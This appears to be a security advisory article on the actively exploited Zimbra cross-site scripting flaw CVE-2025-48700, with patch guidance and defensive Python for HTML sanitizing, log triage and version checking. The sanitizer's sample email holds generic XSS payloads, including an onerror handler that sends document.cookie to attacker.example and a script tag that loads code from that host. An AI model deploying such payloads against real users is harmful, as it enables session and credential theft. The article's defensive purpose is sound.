Zimbra XSS Flaw CVE-2025-48700 Hits 10K Servers

Over 10,500 unpatched Zimbra servers are exposed to CVE-2025-48700, a cross-site scripting flaw that is being exploited in the wild. Learn what's at risk and how to secure your instance now.
More than 10,500 Zimbra Collaboration Suite servers remain unpatched against an actively exploited cross-site scripting vulnerability tracked as CVE-2025-48700. CISA added the flaw to its Known Exploited Vulnerabilities catalog this week, and Shadowserver confirmed the exposed server count on Friday. The XSS vulnerability affects ZCS versions 8.8.15, 9.0, 10.0, and 10.1, and patches have been available since June 2025. Thousands of organizations running Zimbra simply have not applied them.
How CVE-2025-48700 Works
The attack surface is the Zimbra Classic UI webmail interface. An unauthenticated attacker sends a specially crafted email whose HTML body gets past the sanitization Zimbra applies to message content. When the recipient opens it in a vulnerable Classic UI session, the embedded JavaScript runs in the browser within the webmail application's origin. No user interaction beyond opening the email is required: no malicious attachments, no links to click, no macros.
Once the JavaScript runs in the victim's session, the attacker can read whatever that session can reach, including authentication tokens, email content, and contacts, and can issue requests to the webmail backend as the victim. The payload lives entirely inside the HTML body of a single message, so controls that inspect attachments and URLs, and scanners that look only for those, will not see it.
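As an added illustration (not Zimbra's sanitizer and not the CVE-2025-48700 payload, which the advisory does not publish), the allowlist sanitizer below shows the control that has to hold for every HTML message a webmail client renders: active-content elements, event-handler attributes, script-scheme URLs and comments are stripped, text is re-escaped, and an audit trail records what was removed. The sample message is constructed and uses generic XSS constructs. It is a sketch of the idea; in production use a maintained library such as bleach or DOMPurify.

```python
"""Allowlist HTML sanitizer for untrusted mail bodies (illustration only).

Added example, not Zimbra code.  Anything the sanitizer lets through runs in
the webmail origin, which is exactly the failure an XSS-by-email exploits.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img",
                "ul", "ol", "li", "div", "span", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# Elements whose body is code, markup or styling rather than prose: the
# element and everything inside it is dropped.
ACTIVE_CONTENT = {"script", "style", "iframe", "object", "embed",
                  "svg", "math", "template"}


def safe_url(value, tag):
    """Allow only absolute http(s) URLs, plus mailto: on links.  Relative and
    cid: references are rejected too; a real client resolves cid: itself."""
    if not value:
        return False
    # urlparse strips embedded tab/CR/LF, so "java\nscript:" is still caught.
    scheme = urlparse(value.strip()).scheme.lower()
    allowed = {"http", "https", "mailto"} if tag == "a" else {"http", "https"}
    return scheme in allowed


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized fragments, joined at the end
        self.dropped = []      # (what, why): audit trail of removed content
        self._skip = 0         # nesting depth inside an ACTIVE_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self._skip:
            self._skip += tag in ACTIVE_CONTENT
            return
        if tag in ACTIVE_CONTENT:
            self._skip = 1
            self.dropped.append((tag, "active content element"))
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, "tag not allowlisted"))
            return
        kept = []
        for name, value in attrs:          # html.parser lowercases names
            if name.startswith("on"):      # onerror, onload, onclick, ...
                self.dropped.append((f"{tag}@{name}", "event handler"))
            elif name not in ALLOWED_ATTRS.get(tag, ()):
                self.dropped.append((f"{tag}@{name}", "attribute not allowlisted"))
            elif name in ("href", "src") and not safe_url(value, tag):
                self.dropped.append((f"{tag}@{name}", "unsafe URL"))
            else:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip:
            self._skip -= tag in ACTIVE_CONTENT
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))   # text is re-escaped, never passed raw

    # Comments (including IE conditional comments), doctypes, CDATA sections
    # and processing instructions carry no prose: drop them all.
    def handle_comment(self, data):
        self.dropped.append(("comment", "comment"))

    def handle_decl(self, decl):
        self.dropped.append(("decl", "declaration"))

    def unknown_decl(self, data):
        self.dropped.append(("decl", "declaration"))

    def handle_pi(self, data):
        self.dropped.append(("pi", "processing instruction"))


def sanitize(html):
    """Return (clean_html, dropped) for an untrusted message body."""
    s = MailSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed message body using generic XSS tricks (not the CVE's payload).
SAMPLE_EMAIL_HTML = """<p>Quarterly report attached.</p>
<img src="x" onerror="fetch('https://attacker.example/c?t='+document.cookie)">
<a href="javascript:alert(document.domain)">Open report</a>
<script>alert(1)</script>
<a href="https://intranet.example/report">Real link</a>
<!--[if IE]><script src="https://attacker.example/ie.js"></script><![endif]-->
"""

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_EMAIL_HTML)
    print(clean)
    for what, why in dropped:
        print(f"dropped {what}: {why}")
```

The audit trail is the useful part operationally: a mail pipeline that logs what the sanitizer removed from inbound messages gives you a cheap detection signal for weaponized HTML, whether or not the rendering client is vulnerable.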
Who Is Actively Exploiting This
CISA's KEV listing confirms real-world exploitation, though the agency has not published specific attacker attribution for CVE-2025-48700. The broader pattern here is worth understanding. A related Zimbra XSS flaw, CVE-2025-66376, was weaponized by APT28 (Fancy Bear) in phishing campaigns against Ukrainian government entities starting in January. Researchers at Seqrite Labs dubbed that operation GhostMail. APT29 (Cozy Bear) targeted vulnerable Zimbra servers at mass scale in late 2024. Russian cyberespionage group Winter Vivern exploited a similar reflected XSS bug in 2023 to steal emails from NATO-aligned organizations.
Zimbra's position as an email platform for government agencies and large enterprises makes it a consistent, high-value target for state-backed actors. The concentration of unpatched servers in Asia (3,794) and Europe (3,793) according to Shadowserver suggests this is not a niche exposure.
What Developers and Admins Are Actually Risking
If your organization runs Zimbra, the risk is not theoretical. A successful exploit gives an attacker JavaScript execution inside a logged-in user's browser session. From there they can exfiltrate session tokens or simply use them in place from the victim's browser, act as the user against the mail server and anything else that trusts that session, read mail and set up silent forwarding, or pivot to further compromise depending on what other applications share that session context.
Government agencies operating under FCEB designation were ordered to patch by April 23. That deadline has passed. For everyone else, no mandatory deadline exists, but active exploitation means the window to act before an incident is closing fast.
How to Fix This Now
The steps are straightforward. Synacor released patches in June 2025. Apply them.
- Update ZCS to the latest patched release for your branch (8.8.15, 9.0, 10.0, or 10.1 all require updates).
- If you cannot patch immediately, restrict access to Zimbra Classic UI from untrusted networks at the perimeter level.
- Review mailbox and audit logs for the actions a stolen session would take, not for the script itself (webmail logs do not record JavaScript execution): the same account active from several client IPs or user agents within minutes, logins from unfamiliar addresses, and newly created forwarding or filter rules.
- Consider a Content Security Policy on the Zimbra web interface to restrict where scripts may load from and where the page may send data, so that a payload that does reach the browser has less room to work. Test it in staging first: the Classic UI depends on inline scripts, so an overly strict policy breaks the client, and CSP is a mitigation, not a substitute for the patch.
- Run an external scan against your Zimbra-facing endpoints to confirm patch status from an attacker's perspective.
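For the log-review step above, here is an added example of the triage logic (not Zimbra tooling). It assumes mailbox.log lines carry Zimbra's bracketed context block (name, ip, ua) and that the SOAP request name appears in the message; the sample lines are constructed in that shape and are not real server output. It flags an account seen from more than one IP or user agent inside a ten-minute window, and any request that sets up persistence (filter rules, preferences such as forwarding, identities).

```python
"""Triage mailbox.log-style lines for signs of a hijacked webmail session.

Added example, not Zimbra tooling.  Assumed line shape (constructed):
  <ts>,<ms> <LEVEL> [<thread:url>] [name=..;mid=..;ip=..;ua=..;] soap - <Request> ...
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d),\d+\s+\w+\s+"
    r"\[[^\]]*\]\s+\[(?P<ctx>[^\]]*)\]\s+(?P<msg>.*)$"
)
REQUEST_RE = re.compile(r"\b(\w+Request)\b")

# SOAP requests an attacker with a stolen session uses to persist access:
# filter rules (silent forwarding), preferences, alternate identities.
# Request names are from the Zimbra mail API; treat the list as a starting point.
PERSISTENCE_REQUESTS = {"ModifyFilterRulesRequest", "ModifyPrefsRequest",
                        "CreateIdentityRequest"}


def parse_line(line):
    """Return {ts, name, ip, ua, request} for one log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ctx = dict(kv.split("=", 1) for kv in m["ctx"].split(";") if "=" in kv)
    req = REQUEST_RE.search(m["msg"])
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
        "name": ctx.get("name", "?"),
        "ip": ctx.get("ip", "?"),
        "ua": ctx.get("ua", "?"),
        "request": req[1] if req else None,
    }


def find_session_anomalies(lines, window=timedelta(minutes=10)):
    """Map account -> list of findings.  Multi-IP / multi-UA is reported once
    per account (first time it is observed); persistence requests always."""
    by_account = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_account[ev["name"]].append(ev)

    findings = defaultdict(list)
    for account, events in by_account.items():
        events.sort(key=lambda e: e["ts"])
        flagged = set()
        for i, ev in enumerate(events):
            recent = [e for e in events[: i + 1] if ev["ts"] - e["ts"] <= window]
            for key, label in (("ip", "client IPs"), ("ua", "user agents")):
                values = {e[key] for e in recent}
                if len(values) > 1 and key not in flagged:
                    flagged.add(key)
                    findings[account].append(
                        f"{ev['ts']:%H:%M:%S} {len(values)} {label} within "
                        f"{window}: {sorted(values)}")
            if ev["request"] in PERSISTENCE_REQUESTS:
                findings[account].append(
                    f"{ev['ts']:%H:%M:%S} {ev['request']} from {ev['ip']} ({ev['ua']})")
    return dict(findings)


# Constructed sample: alice reads mail from her desktop client, then her
# session is used from another address by a scripted client that installs a
# filter rule.  bob is normal.
SAMPLE_LOG = """
2026-04-20 09:12:01,101 INFO  [qtp1-10:https://mail.example.com/service/soap/NoOpRequest] [name=alice@example.com;mid=12;ip=198.51.100.24;ua=zclient/10.1.5_GA_4776;] soap - NoOpRequest elapsed=2
2026-04-20 09:12:44,512 INFO  [qtp1-11:https://mail.example.com/service/soap/GetMsgRequest] [name=alice@example.com;mid=12;ip=198.51.100.24;ua=zclient/10.1.5_GA_4776;] soap - GetMsgRequest elapsed=15
2026-04-20 09:13:09,007 INFO  [qtp1-12:https://mail.example.com/service/soap/SearchRequest] [name=alice@example.com;mid=12;ip=203.0.113.77;ua=curl/8.4.0;] soap - SearchRequest elapsed=40
2026-04-20 09:13:30,300 INFO  [qtp1-13:https://mail.example.com/service/soap/ModifyFilterRulesRequest] [name=alice@example.com;mid=12;ip=203.0.113.77;ua=curl/8.4.0;] soap - ModifyFilterRulesRequest elapsed=9
2026-04-20 09:14:02,220 INFO  [qtp1-14:https://mail.example.com/service/soap/NoOpRequest] [name=bob@example.com;mid=13;ip=198.51.100.40;ua=zclient/10.1.5_GA_4776;] soap - NoOpRequest elapsed=2
""".strip().splitlines()

if __name__ == "__main__":
    for account, notes in find_session_anomalies(SAMPLE_LOG).items():
        print(account)
        for note in notes:
            print("  ", note)
```

Tune the window and the request list to your environment: users on mobile networks legitimately change IPs, so in practice the user-agent change plus a persistence request is the stronger signal, and the multi-IP finding on its own is a prompt to look, not a verdict.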
You can run an automated check against your Zimbra instance at VibeWShield's scanner to identify exposed XSS vectors before attackers do. For broader context on XSS attack patterns, see our guide to reflected and stored XSS vulnerabilities.
How does CVE-2025-48700 differ from a typical phishing attack? Standard phishing relies on tricking users into clicking links or opening attachments. This exploit executes malicious JavaScript the moment the email is rendered in Zimbra's Classic UI. No interaction beyond opening the message is required, and no external resources are fetched that would trigger conventional security filters.
My Zimbra instance is behind a firewall. Am I still at risk? Partially. Network restrictions reduce exposure to external attackers, but internal threats or attackers who have already gained a foothold in your network can still deliver malicious emails through normal mail flow. Patching remains necessary regardless of perimeter controls.
How do I verify whether my Zimbra server is actually patched? Log into your ZCS admin console and compare the build version against Synacor's June 2025 security advisory; on the server itself, running zmcontrol -v as the zimbra user prints the same release string, including the patch level on 8.8.15 and 9.0. Alternatively, use an external DAST scanner to probe the webmail interface for XSS indicators without requiring admin access.
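For the version check just described and the update step in the checklist above, here is an added example (not Zimbra tooling) that parses the release string from zmcontrol -v and compares it, patch level included, with the minimum fixed release for the installed branch. The output shapes it expects are assumptions drawn from typical 10.x and 8.8.15 installs, and the minimum versions in the block are placeholders: take the real ones from Synacor's advisory for CVE-2025-48700.

```python
"""Compare the installed Zimbra release against the minimum patched release.

Added example, not Zimbra tooling.  Assumed `zmcontrol -v` output shapes
(constructed, run as the zimbra user):
  Release 10.1.5.GA.4776.UBUNTU22.64 UBUNTU22_64 FOSS edition.
  Release 8.8.15_GA_3869.RHEL7_64_20190918004220 RHEL7_64 FOSS edition, Patch 8.8.15_P46.
"""
import re
import subprocess

RELEASE_RE = re.compile(r"Release\s+(\d+)\.(\d+)\.(\d+)")
PATCH_RE = re.compile(r"Patch\s+\d+\.\d+\.\d+_P(\d+)")
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:_P(\d+))?$")

# PLACEHOLDERS ONLY.  Fill in the fixed releases from Synacor's advisory for
# CVE-2025-48700 for each branch the page lists.
PLACEHOLDER_MINIMUMS = {
    "8.8.15": "8.8.15_P99",
    "9.0": "9.0.0_P99",
    "10.0": "10.0.99",
    "10.1": "10.1.99",
}


def parse_version(spec):
    """'10.1.9' -> (10, 1, 9, 0); '8.8.15_P49' -> (8, 8, 15, 49)."""
    m = VERSION_RE.match(spec.strip())
    if not m:
        raise ValueError(f"bad version spec: {spec!r}")
    major, minor, build, patch = m.groups()
    return (int(major), int(minor), int(build), int(patch or 0))


def parse_zmcontrol(output):
    """Extract (major, minor, build, patch) from `zmcontrol -v` output."""
    m = RELEASE_RE.search(output)
    if not m:
        raise ValueError("no 'Release X.Y.Z' found in zmcontrol output")
    p = PATCH_RE.search(output)        # only branches that use P-levels
    return (int(m[1]), int(m[2]), int(m[3]), int(p[1]) if p else 0)


def branch_of(version):
    """Branch key as the advisory names them: 8.8.15, 9.0, 10.0, 10.1."""
    major, minor, build, _ = version
    return "8.8.15" if (major, minor, build) == (8, 8, 15) else f"{major}.{minor}"


def fmt(version):
    base = ".".join(str(n) for n in version[:3])
    return f"{base}_P{version[3]}" if version[3] else base


def assess(output, minimums):
    """Return (is_patched, message).  An unknown branch is reported as not
    patched so that an end-of-life or unexpected install is never waved through."""
    installed = parse_zmcontrol(output)
    branch = branch_of(installed)
    if branch not in minimums:
        return False, (f"UNPATCHED: branch {branch} (installed {fmt(installed)}) "
                       f"is not in the minimum table")
    required = parse_version(minimums[branch])
    ok = installed >= required
    verdict = "patched" if ok else "UNPATCHED"
    return ok, (f"{verdict}: installed {fmt(installed)}, minimum for branch "
                f"{branch} is {fmt(required)}")


if __name__ == "__main__":
    out = subprocess.run(["zmcontrol", "-v"], capture_output=True, text=True).stdout
    ok, message = assess(out, PLACEHOLDER_MINIMUMS)
    print(message)
    raise SystemExit(0 if ok else 1)
```

The exit status makes the script usable from a fleet inventory job. Note that a 9.0 release string reads 9.0.0 with the patch carried in the P-level, so the comparison has to include that fourth component; comparing only the dotted release would pass every 9.0 and 8.8.15 install regardless of patch state.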
Check if your Zimbra instance is exposed right now: Run a free scan at VibeWShield.